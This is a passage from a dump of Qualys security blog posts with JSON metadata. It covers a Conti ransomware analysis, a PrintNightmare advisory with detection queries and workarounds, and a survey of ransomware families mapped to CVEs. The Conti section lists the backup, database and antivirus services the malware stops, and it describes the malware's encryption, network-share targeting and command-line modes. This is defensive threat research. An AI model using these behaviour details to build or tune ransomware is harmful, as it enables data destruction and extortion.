5 in the loop.\n\nMSSQL$BKUPEXEC| MSSQL$SQLEXPRESS| MSSQLFDLauncher$SHAREPOINT \n---|---|--- \nMSSQL$ECWDB2| MSSQL$SYSTEM_BGC| MSSQLFDLauncher$SQL_2008 \nMSSQL$PRACTICEMGT| MSSQL$TPS| MSSQLFDLauncher$SYSTEM_BGC \nMSSQL$PRACTTICEBGC| MSSQL$TPSAMA| MSSQLFDLauncher$TPS \nMSSQL$PROD| MSSQL$VEEAMSQL2008R2| MSSQLFDLauncher$TPSAMA \nMSSQL$PROFXENGAGEMENT| MSSQL$VEEAMSQL2008R2| MSSQLSERVER \nMSSQL$SBSMONITORING| MSSQL$VEEAMSQL2012| MSSQLServerADHelper \nMSSQL$SHAREPOINT| MSSQLFDLauncher| MSSQLServerADHelper100 \nMSSQL$SOPHOS| MSSQLFDLauncher$PROFXENGAGEMENT| MSSQLServerOLAPService \nMSSQL$SQL_2008| MSSQLFDLauncher$SBSMONITORING| MySQL57 \nAcronis VSS Provider| Mfemms| DCAgent \nAcronisAgent| Mfevtp| EhttpSrv \nAcrSch2Svc| MMS| Ekrn \nAntivirus| Mozyprobackup| Enterprise Client Service \nARSM| MsDtsServer| EPSecurityService \nAVP| MsDtsServer100| EPUpdateService \nBackupExecAgentAccelerator| MsDtsServer110| EraserSvc11710 \nBackupExecAgentBrowser| MSExchangeES| EsgShKernel \nBackupExecDeviceMediaService| MSExchangeIS| ESHASRV \nBackupExecJobEngine| MSExchangeMGMT| FA_Scheduler \nBackupExecManagementService| MSExchangeMTA| MSOLAP$TPSAMA \nBackupExecRPCService| MSExchangeSA| McShield \nBackupExecVSSProvider| MSExchangeSRS| McTaskManager \nBedbg| msftesql$PROD| Mfefire \nIISAdmin| MSOLAP$SQL_2008| Klnagent \nIMAP4Svc| MSOLAP$SYSTEM_BGC| MSOLAP$TPS \n \nConti also leverages the Windows Restart Manager to close applications and services that are running in order to make them available for encryption and to maximize the damage:\n\nFig. 6 Unlock files with Windows Restart Manager\n\nIt collects information about drives and drive types present on compromised systems:\n\nFig. 7 Collect Drives Information\n\nAs shown in Fig. 8, Conti uses multi-threaded tactics. It calls `CreateIoCompletionPort` API to create multiple instances of worker threads into memory to wait for data. Once the file listing is completed, it is passed to the worker threads. 
Utilizing the computing power of multi-core CPUs, the data is quickly encrypted:\n\nFig. 8 Implementation of Multi-threaded Processing Fig. 9 Multiple Threads Perform File Encryption\n\nConti then iterates files on the local system and those on remote SMB network shares to determine what data to encrypt. It looks for folders and drives shared on remote systems using the `NetShareEnum` API. If the remote share is accessible, it encrypts the files present in that share:\n\nFig. 10 Getting Info of Remote Shares\n\nIt collects ARP cache information from the local system using the `GetIpNetTable` API. The ARP cache is a list of all the systems with which the computer recently communicated. It checks for "172.", "192.168." etc. in the collected IP list. If an IP address is in a different range, it skips that system during encryption:\n\nFig. 11 Collect ARP Cache Information\n\nIt uses an AES-256 encryption key per file together with a hard-coded RSA-4096 public key. As shown in Fig. 12, the value 0x6610 is passed as the algorithm identifier (alg_id) when calling the `CryptGenKey` API; 0x6610 is the value of the CALG_AES_256 identifier:\n\nFig. 12 Create CALG_AES_256 Key\n\nConti has a unique feature that allows attackers to perform file encryption in command line mode:\n\nFig. 13 Command Line Mode of Operation\n\n### Modes of Operation\n\nConti supports two command line options, `--encrypt-mode` and `-h`:\n\nFig. 14 Command Line `--encrypt-mode` Mode\n\n`--encrypt-mode` selects which files are encrypted. There are 3 options for its value: `all`, `local`, and `network`. By default, the ransomware runs with the `all` parameter:\n\nFig. 15 Command Line `--encrypt-mode` with Value `all`\n\nWith `all`, both local and network encryption are carried out. `network` means that shared resources on the local network will be encrypted:\n\nFig. 16 Command Line `--encrypt-mode` Mode with Value `local` Fig. 
17 Command Line `--encrypt-mode` Mode with Value `network`\n\nIn command line `-h` mode, the parameter may contain the name of a file that lists the DNS and NetBIOS addresses of remote servers. The malware will then build a list of folders to ignore during encryption:\n\nFig. 18 Folders Ignored in Encryption\n\nIt skips the following extensions during encryption: .exe, .dll, .sys, .lnk, and .CONTI. It appends the file extension `.CONTI` and creates a ransom note named `CONTI_README.txt` in every folder to notify users about the infection:\n\nFig. 19 \u201c.CONTI\u201d Extension Appended to Files\n\n### The Ransom Note:\n\nThe ransom note and the note\u2019s file information are present in the resource of malware files:\n\nFig. 20 Ransom Note Content Fig. 21 Ransom Note Name\n\nIt calls the `LoadResource` API to get ransom note-related information:\n\nFig. 22 Code to Collect Data Related to the Ransom Note\n\nThe ransom note contains 2 email addresses to get in touch with the attackers. The addresses are unique for each victim:\n\nFig. 
23 Ransom Note\n\n### IoC:\n \n \n eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe\n\n### TTP Map:\n\nInitial Access| Execution| Persistence| Privilege Escalation| Defense Evasion| Credential Access| Discovery| Lateral Movement| Collection| Command and control| Exfiltration| Impact \n---|---|---|---|---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Command and Scripting Interpreter: Windows Command Shell (T1059.003)| Valid Accounts (T1078)| Process Injection: Dynamic-link Library Injection (T1055.001)| Obfuscated Files or Information (T1027)| Brute Force (T1110)| System Network Configuration Discovery (T1016)| Remote Services: SMB/Windows Admin Shares (T1021.002)| Archive Collected Data: Archive via Utility (T1560.001)| Remote file copy (T1105)| Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002)| Data Encrypted for Impact (T1486) \nPhishing: Spearphishing Attachment (T1566.001)| Native Application Programming Interface (API)(T1106)| External Remote Services (T1133)| Valid accounts: domain accounts (T1078.002)| Process Injection: Dynamic-link Library Injection (T1055.001)| Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003)| System Network Connections Discovery (T1049)| Taint Shared Content (T1080)| | | | Service Stop (T1489) \nPhishing: Spearphishing Link (T1566.002)| Windows Management Instrumentation (T1047)| Scheduled task/job: scheduled task (T1053.005)| | Deobfuscate/Decode Files or Information (T1140)| OS credential dumping (T1003)| Process Discovery (T1057)| Exploitation of Remote Services (T1210)| | | | Inhibit System Recovery (T1490) \nExploit public-facing application (T1190)| User execution (T1204)| Startup item (T1165)| | Impair defenses: disable or modify tools (T1562.001)| Credentials from password stores (T1555)| File and Directory Discovery (T1083)| Lateral tool transfer (T1570)| | | | \n| Scheduled task/job: scheduled task (T1053.005)| Boot or logon autostart execution: Winlogon Helper DLL 
(T1547.004)| | | | Network Share Discovery (T1135)| | | | | \n| Command and Scripting Interpreter: PowerShell (T1059.001)| | | | | Remote System Discovery (T1018)| | | | | \n| | | | | | Network Service Scanning (T1046)| | | | | \n| | | | | | Permission groups discovery: domain groups (T1069.002)| | | | | \n| | | | | | System information discovery (T1082)| | | | | \n| | | | | | System owner/user discovery (T1033)| | | | | \n| | | | | | Security software discovery (T1063)| | | | | \n| | | | | | Account Discovery: Local Account (T1087.001)| | | | | \n| | | | | | Permissions Group Discovery: Local Groups (T1069.001)| | | | | \n| | | | | | | | | | | \n \n### Summary\n\nTo defend against threats, Qualys recommends good cyber hygiene practices, and moving to a preventative approach by keeping network configurations, backup, application access, and patching up-to-date.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-18T17:17:56", "type": "qualysblog", "title": "Conti Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2020-1472", "CVE-2021-34527"], "modified": "2021-11-18T17:17:56", "id": 
"QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:25", "description": "**Update July 9, 2021**: Added "Registry Settings Check After Installing the Updates" section below.\n\n**Original Post**: On June 29, 2021, a zero-day exploit was observed on Microsoft Windows systems which allows authenticated users with a regular Domain User account to gain full SYSTEM-level privileges. On July 1, 2021, Microsoft released a separate [advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) linking this zero-day to CVE-2021-34527 as a confirmed Remote Code Execution (RCE) vulnerability. According to the new advisory, the PoC is publicly disclosed and actively exploited in the wild.\n\nOn July 6, 2021, [Microsoft released patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) to address the PrintNightmare zero-day vulnerabilities.\n\nOn July 7, 2021, after Microsoft patches were released, some security researchers found that these were incomplete patches and threat actors could still leverage local privilege escalation vulnerability to gain access to the system.\n\nPer [BleepingComputer news](<https://www.bleepingcomputer.com/news/microsoft/microsofts-incomplete-printnightmare-patch-fails-to-fix-vulnerability/>), \u201cAfter update was released, security researchers [Matthew Hickey](<https://twitter.com/hackerfantastic/status/1410100394492112898>), co-founder of Hacker House, and [Will Dormann](<https://twitter.com/wdormann>), a vulnerability analyst for CERT/CC, determined that Microsoft only fixed the remote code execution component of the vulnerability. 
However, malware and threat actors could still use the local privilege escalation component to gain SYSTEM privileges on vulnerable systems for older Windows versions, and for newer versions if the Point and Print policy was enabled.\u201d\n\n#### About PrintNightmare\n\nPrintNightmare (CVE-2021-34527) is a vulnerability that allows an attacker with a regular user account to take over a server running the Windows Print Spooler service. This service runs on all Windows servers and clients by default, including domain controllers, in an Active Directory environment. Print Spooler, which is enabled by default on Microsoft Windows, is an executable file that manages print jobs sent to the computer printer or print server.\n\nA team of security researchers from Sangfor discovered this zero-day vulnerability. In a tweet they wrote, \n\n> \u201cWe deleted the POC of PrintNightmare. To mitigate this vulnerability, please update Windows to the latest version, or disable the Spooler service. For more RCE and LPE in Spooler, stay tuned and wait our Blackhat talk.\u201d \n\nThe GitHub repository was taken offline after a few hours, but not before it was [cloned](<https://github.com/cube0x0/CVE-2021-1675>) by several other users.\n\n_PrintNightmare_ execution looks for _kernelbase.dll, unidrv.dll_ files along with any other DLLs written into subfolders of _C:\\Windows\\System32\\spool\\drivers_ in the same timeframe by _spoolsv.exe_. 
A hard-coded printer driver path is not required as one can use _EnumPrinterDrivers()_ to find the path for _unidrv.dll._\n\n#### Affected Products\n\nAll Windows servers and clients, including domain controllers.\n\n### Identify Assets, Discover, Prioritize and Remediate Using Qualys VMDR\u00ae\n\nUse [Qualys Vulnerability Management, Detection, and Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) for:\n\n * Identification of known and unknown hosts running vulnerable Windows servers with Print Spooler service\n * Automatic detection of vulnerabilities and misconfigurations for Windows systems\n * Prioritization of threats based on risk\n * Integrated patch deployment\n\n#### Identification of Windows Assets with Print Spooler Running\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. VMDR enables easy identification of Windows hosts with the Print Spooler service running, using the following QQL query:\n\n`operatingSystem.category1:`Windows` and services.name:`Spooler``\n\nOnce the hosts are identified, they can be grouped together with a dynamic tag, e.g. \u201cPrintNightmare\u201d. This helps in automatically grouping existing Windows hosts with the PrintNightmare vulnerability as well as any new host that spins up with this vulnerability. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n#### Discover PrintNightmare CVE-2021-34527 Vulnerability\n\nNow that the Windows hosts with PrintNightmare are identified, you want to detect which of these assets have flagged this vulnerability. 
VMDR automatically detects new vulnerabilities like PrintNightmare based on the always updated Knowledgebase.\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018PrintNightmare\u2019 asset tag in the vulnerabilities view by using QQL query:\n\n`vulnerabilities.vulnerability.qid: `91785``\n\nThis will return a list of all impacted hosts.\n\n\n\nQID 91785 is available in signature version VULNSIGS-2.5.226-3 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.226.3-2 and above.\n\nAlong with the QID 91785, Qualys released the following IG QID 45498 to help customers identify if Print Spooler service is running on Windows systems. This QID can be detected using authenticated scanning using VULNSIGS- 2.5.223-3 and above or the Qualys Cloud Agent manifest version 2.5.223.3-2 and above.\n\n`QID 45498: Microsoft Windows Print Spooler Service is Running`\n\n**Update July 8, 2021**: Qualys released QID 91786 to address the Zero Day. In addition, IG QID is released to identify if Point and Print restrictions are enabled. These QIDs can be detected using authenticated scanning using VULNSIGS- 2.5.228-3 and above or the Qualys Cloud Agent manifest version 2.5.228.3-2 and above. \n\n`QID 91786 Microsoft Windows Print Spooler Point and Print Insecure Configuration Detected (PrintNightmare) `\n\n`QID 45499 Point and Print Restrictions NoWarningNoElevationOnInstall Is Enabled`\n\nUsing VMDR, the PrintNightmare vulnerability can be prioritized for the following real-time threat indicators (RTIs):\n\n * Remote Code Execution\n * Privilege Escalation\n * Public Exploit\n * Active Attack\n * Denial of Service\n * High Data Loss\n * High Lateral Movement\n * Predicted High Risk\n * Unauthenticated_Exploitation\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. 
With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n\n\nSimply click on the impacted assets for the PrintNightmare threat feed to see the vulnerability and impacted host details.\n\n#### Dashboard\n\nWith VMDR Dashboard, you can track PrintNightmare, impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of PrintNightmare vulnerability trends in your environment with the [PrintSpooler RCE (PrintNightmare) dashboard](<https://qualys-secure.force.com/customer/s/article/000006719>).\n\n\n\n#### Response by Patching and Remediation\n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply search based on `qid:91785` in the Patch Tab and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 PrintNightmare.\n\nFor proactive, continuous patching, you can create a daily job with a 24-hour patch window to ensure all hosts will continue to receive the required patches as new patches become available for emerging vulnerabilities.\n\nUsers are encouraged to apply patches as soon as possible.\n\n\n\n#### Identify and Address System Misconfigurations\n\nTo reduce the overall security risk, it is important to take care of Windows system misconfigurations as well. Qualys VMDR shows your Windows system misconfiguration posture in context with your vulnerability posture, allowing you to see which hosts have the PrintNightmare vulnerability. 
\n\nWith the [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) module of VMDR, you can automatically discover the status of the \u2018Print Spooler\u2019 service and if they have misconfigurations in context to the PrintNightmare vulnerability.\n\n\n\nQualys configuration ID \u2013 1368 \u201cStatus of the \u2018Print Spooler\u2019 service\u201d \n\u201d would be evaluated against all Windows systems as shown below\n\n\n\n21711 Status of the \u2018Allow Print Spooler to accept client connections\u2019 group policy setting would be evaluated as shown below\n\n\n\n#### Registry Settings Check After Installing the Updates\n\nAs reported in the [Microsoft advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) on July 7, 2021: In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (Note: These registry keys do not exist by default, and therefore are already at the secure setting.), also that your Group Policy setting are correct.\n\n * HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\n * NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)\n * UpdatePromptSettings = 0 (DWORD) or not defined (default setting)\n\nQualys Policy Compliance customers can evaluate the settings by the following two controls:\n\n19070 Status of the \u2018Point and Print Restrictions: When installing drivers for a new connection\u2019 setting\n\n\n\n19071 Status of the \u2018Point and Print Restrictions: When updating drivers for an existing connection\u2019 setting\n\n\n\n### Workaround\n\nUsers are urged to disable the \u201cPrint Spooler\u201d service on servers that do not require it. 
Microsoft has provided a series of [workarounds](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) to be applied.\n\nDetermine if the Print Spooler service is running (run as a Domain Admin)\n\nRun the following as a Domain Admin: \n`Get-Service -Name Spooler`\n\nIf the Print Spooler is running or if the service is not set to disabled, select one of the following options to either disable the Print Spooler service, or to Disable inbound remote printing through Group Policy:\n\n##### **Option 1** \u2013 Disable the Print Spooler service\n\nIf disabling the Print Spooler service is appropriate for your enterprise, use the following PowerShell commands: \n`Stop-Service -Name Spooler -Force \nSet-Service -Name Spooler -StartupType Disabled` \n \n**Impact of workaround**: Disabling the Print Spooler service disables the ability to print both locally and remotely.\n\n##### **Option 2** \u2013 Disable inbound remote printing through Group Policy\n\nYou can also configure the settings via Group Policy as follows: \n_Computer Configuration / Administrative Templates / Printers_ \nDisable the \u201cAllow Print Spooler to accept client connections:\u201d policy to block remote attacks. \n \n**Impact of workaround:** This policy will block the remote attack vector by preventing inbound remote printing operations. 
The system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nPer the above two options, Qualys Policy Compliance customers can do evaluation by the following two controls:\n\n * 1368 Status of the \u2018Print Spooler\u2019 service\u201d\n * 21711 Status of the \u2018Allow Print Spooler to accept client connections\u2019 group policy setting\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching critical PrintNightmare vulnerability CVE-2021-34752.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T23:30:23", "type": "qualysblog", "title": "Microsoft Windows Print Spooler RCE Vulnerability (PrintNightmare-CVE-2021-34527) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR\u00ae", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-34752"], "modified": "2021-07-07T23:30:23", "id": "QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "href": 
Link: <https://blog.qualys.com/category/vulnerabilities-threat-research>.

* * *

**The Rise of Ransomware** (Qualys Blog, published 2021-10-05)

With most employees still working from remote locations, ransomware attacks have increased steadily since the early months of the Covid-19 pandemic. According to the FBI’s 2020 Internet Crime Report, 2400+ ransomware-related incidents in 2020 resulted in a loss of about 29 million dollars. These numbers are only getting worse and do not include damage from incidents not reported to the FBI.

Ransomware attacks affect various industries worldwide, and ransomware demands continue to increase. Some recent examples include:

 * [Conti Ransomware](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>): Conti ransomware is spread using spear-phishing campaigns through tailored emails that contain malicious attachments or malicious links, and via stolen or weak Remote Desktop Protocol (RDP) credentials.
 * [Nefilim Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>): Nefilim ransomware is distributed through exposed Remote Desktop Protocol (RDP) setups by brute-forcing them and by using other known vulnerabilities for initial access, such as those in Citrix gateway devices.
 * [REvil Ransomware](<https://blog.qualys.com/product-tech/2021/07/08/kaseya-revil-ransomware-attack-cve-2021-30116-automatically-discover-and-prioritize-using-qualys-vmdr>): REvil is a ransomware family that operates as ransomware-as-a-service (RaaS), has been linked to GOLD SOUTHFIELD, a financially motivated group, and was first identified in April 2019 according to MITRE.
 * [DarkSide Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/06/09/darkside-ransomware>): DarkSide ransomware performs brute-force attacks and exploits known vulnerabilities in the Remote Desktop Protocol (RDP) to gain initial access. DarkSide ransomware, first seen in August 2020 and updated as v2.0 in March 2021, is associated with the DarkSide group and now often operates as RaaS.
 * [Michigan State University (May 2020)](<https://www.zdnet.com/article/michigan-state-university-hit-by-ransomware-gang/>) - MSU administrators were given a week to pay an undisclosed ransom demand to decrypt their files. If MSU officials refused to pay or chose to restore from backups, the cybercriminals were prepared to leak documents stolen from the university's network on a website the group operates on the dark web.
 * [DearCry and Exchange vulnerabilities](<https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/>) - DearCry ransomware attacks exploited Microsoft Exchange Server vulnerabilities CVE-2021-26855 and CVE-2021-27065. These vulnerabilities were being widely exploited before patches were available, forcing Microsoft to release out-of-band updates.
 * [Colonial Pipeline](<https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html>) - Colonial Pipeline was most likely the target of a ransomware attack due to a vulnerable, outdated version of Microsoft Exchange. Attackers potentially exploited these vulnerabilities, and as a result Colonial Pipeline took its systems down to contain the threat, limiting gasoline supply to the East Coast.

As seen above, industries ranging from education, manufacturing, electronics, research, health and more are impacted by ransomware.

To help organizations combat risks from ransomware, Qualys is introducing the Ransomware Risk Assessment service. As outlined in [_our blog_](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>), the Qualys Ransomware Risk Assessment & Remediation service leverages security intelligence curated by Qualys Research experts to map ransomware families to specific vulnerabilities, misconfigurations, and vulnerable software. The Qualys Ransomware Risk Assessment service enables organizations to:

 * Get a unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations and insecure remote desktop gateways (RDP), as well as detection of risky software in the datacenter environment, along with alerting for assets missing anti-malware solutions.
 * Accelerate remediation of ransomware exposures with zero-touch patching by continuously patching ransomware vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to help you keep software up to date.

#### **Ransomware Infection Vectors**

Although cyber criminals use a variety of techniques to infect victims with ransomware, the most common means of infection are:

 * **Remote Desktop Protocol** (RDP) vulnerabilities: RDP allows individuals to see and control a system remotely. It is a very common practice in organizations as it provides easy remote access to systems. Once cybercriminals have RDP access, they can deploy malicious software on the system, making it inaccessible to legitimate users unless the victim pays the demanded ransom. A Shodan search shows currently open and potentially vulnerable RDP services on the internet, and you can buy RDP access for [as low as US$3](<https://www.bankinfosecurity.com/how-much-that-rdp-credential-in-window-a-10590>).
 * **Email phishing campaigns**: Email is a prevalent medium to get malware into the target environment. Cybercriminals use emails to send malicious links to deploy malware on recipients’ machines. It allows cybercriminals to steal sensitive data without breaking through network security and is very common among cybercriminals.
 * **Software vulnerabilities**: Software vulnerabilities are even more prevalent than phishing. Client- and server-side vulnerabilities allow criminals to take advantage of security weaknesses in widely used software programs, gain control of victim systems, and deploy ransomware. Vulnerabilities in VPN systems such as Pulse Secure VPN and Fortinet are common targets as well.

#### **Ransomware Attacks and Exact CVEs To Prioritize for Monitoring**

As mentioned above, known vulnerabilities and weaknesses are one of the top infection vectors.

The Qualys research team has performed extensive research on 36 prevalent ransomware families and has mapped them to 64 CVEs and the 247 QIDs that can detect them. The following is just a sample list of some of the most widely used ransomware in the attacks, along with the CVEs leveraged to infect systems.

**Ransomware** | **Description** | **CVE(s)** | **QID(s)**
---|---|---|---
Conti | The Conti ransomware strain will not only encrypt important files but will also exfiltrate them to a location controlled by the attacker. This method of extortion-ware is used to force victims to pay the ransom in order to avoid the sensitive data being leaked. Conti operators are known to use well-known hacking tools such as Mimikatz and Cobalt Strike leading up to the encryption of files. | CVE-2020-1472, CVE-2021-34527, CVE-2017-0143, CVE-2017-0144, CVE-2017-0145 | 91680, 91668, 91785, 91345, 91360
Teslacrypt, PrincessLocker | TeslaCrypt ransomware was uploaded to VirusTotal in November 2014 but was more widely spread in early 2015 and continues to evolve. TeslaCrypt encrypts the files using the AES-256 algorithm until the victim pays the ransom in either Bitcoin or cash cards. | CVE-2013-2551, CVE-2015-8651 | 168351, 168350, 124422, 168341, 168340, 100271, 124421
Locky, Cerber | Cerber ransomware is ransomware-as-a-service (RaaS), meaning an attacker can distribute a licensed copy of this ransomware over the internet and pay commissions to the developer. | CVE-2016-1019 | 256924, 256922, 177873, 176784, 296029, 296028, 170815, 170724, 170711, 170365, 256256, 170264, 236438, 170119, 256214, 170052, 276628, 236342, 157445, 169942, 169941, 169923, 276572, 169854, 169853, 176004, 196742, 196725, 370320, 276455, 175965, 168848, 168813, 168792, 168696, 168694, 168594, 100282, 124879, 124872
WannaCry, Badrabbit | The WannaCry ransomware — formally known as WanaCrypt0r 2.0 — spreads using an exploit called EternalBlue for a Windows OS vulnerability that Microsoft patched in March 2017. | CVE-2017-0145 | 91361, 91360, 91359, 91347, 91345
DearCry, BlackKingdom | DearCry takes advantage of compromised Microsoft Exchange Servers with vulnerability CVE-2021-26855. When exploited, cybercriminals gain initial access to the Exchange Server and then install web shells. | CVE-2021-26855 | 50107, 50108

### Unified View of Critical Ransomware Risk Exposures

It is a daunting task to get a unified view of multiple critical ransomware exposures together, such as internet-facing vulnerabilities, misconfigurations and unauthorized software. The Qualys Ransomware Risk Assessment & Remediation service dashboard enables security teams to see all the internet-facing assets that are exposed to a ransomware-related vulnerability or misconfiguration and take the needed actions in the most impactful way. It also enables users to measure and track their effectiveness at addressing vulnerabilities or misconfigurations before they are used for ransomware attacks.

In addition, organizations should implement a good cyber hygiene program: scan for vulnerabilities and discover misconfigurations regularly with sufficient detection capabilities (such as the relevant QIDs) enabled, and run an efficient automated process to deploy important security patches on targeted assets quickly and at the needed scale.

### Qualys Ransomware Risk Assessment & Remediation Service

Qualys provides an all-in-one solution to discover, assess, prioritize, monitor, and patch critical vulnerabilities in real time and across your global hybrid-IT landscape. The following sections provide an overview of each of the critical components from the Qualys product portfolio and how they can be uniquely valuable in the effort of combatting ransomware attacks.

#### Detect your critical data assets & monitor security blind spots with CyberSecurity Asset Management (CSAM)

CSAM enables organizations to automatically discover every asset in their environment, including unmanaged assets appearing on the network, inventory all hardware and software, and classify and tag critical assets.

#### Discover, Inventory and Categorize assets

It is important to know your blind spots to protect against ransomware. Use CSAM to discover all assets, including the ones that are exposed to the internet as well as unknown/unmanaged assets that are connecting to your network.

CSAM automatically organizes your assets by their functional category by analyzing their hardware and installed software. It extends your inventory by incorporating key business information from your CMDB, such as status, environment, ownership, support groups, and business criticality.

#### Monitor & detect at-risk assets and applications - Assets missing anti-virus, running unauthorized software

CSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools.

 * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations.
 * Identify assets missing required security software, such as antivirus and endpoint protection.
 * Identify EOL/EOS software, which can be used as a ransomware attack vector. End-of-support software is one of the first things attackers look to exploit because they know publishers are no longer providing security updates and patches.

### Continuous detection & prioritization for ransomware-specific vulnerabilities with VMDR

The first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with open ports, for example hosts with Remote Desktop Protocol (RDP) enabled:

``operatingSystem.category1:`Windows` and openPorts.port:`3389` ``

Once the hosts with RDP are identified, they can be grouped together with a ‘dynamic tag’, say “RDP Asset”. This helps in automatically grouping existing hosts with this vulnerability as well as any new hosts that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).

### **Discover and Prioritize Ransomware Vulnerabilities**

Now that hosts with “RDP” are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Windows RDP, Exchange Server vulnerabilities and more based on the always-updated Knowledgebase.

You can see all your impacted hosts for this vulnerability tagged with the ‘Ransomware’ asset tag in the vulnerabilities view by using this QQL query:

`vulnerabilities.vulnerability.threatIntel.ransomware: true`

or

`vulnerabilities.vulnerability.ransomware.name:WannaCry`

This will return a list of all impacted hosts.

Using VMDR prioritization, the ransomware vulnerabilities can be easily prioritized using the “Ransomware” Real-Time Threat Intelligence indicator.

VMDR also enables you to stay on top of these threats proactively via the ‘live threat feed’ provided for threat prioritization. With the ‘live feed’ updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats.

Simply click on the impacted assets for the “Ransomware” feeds to see the vulnerability and impacted host details.

Qualys provides a Unified Dashboard with key metrics across all apps, showing your overall security posture against ransomware-related data points such as:

 * Ransomware-related vulnerabilities
 * Unauthorized software
 * Misconfigurations leveraged by ransomware
 * Internet-facing hosts with RDP vulnerabilities, and many more…

The Unified Dashboard enables you to track your ransomware exposure against impacted hosts, their status, and overall management in real time.

### **Discover and Mitigate Ransomware Misconfigurations such as SMB, Insecure RDP**

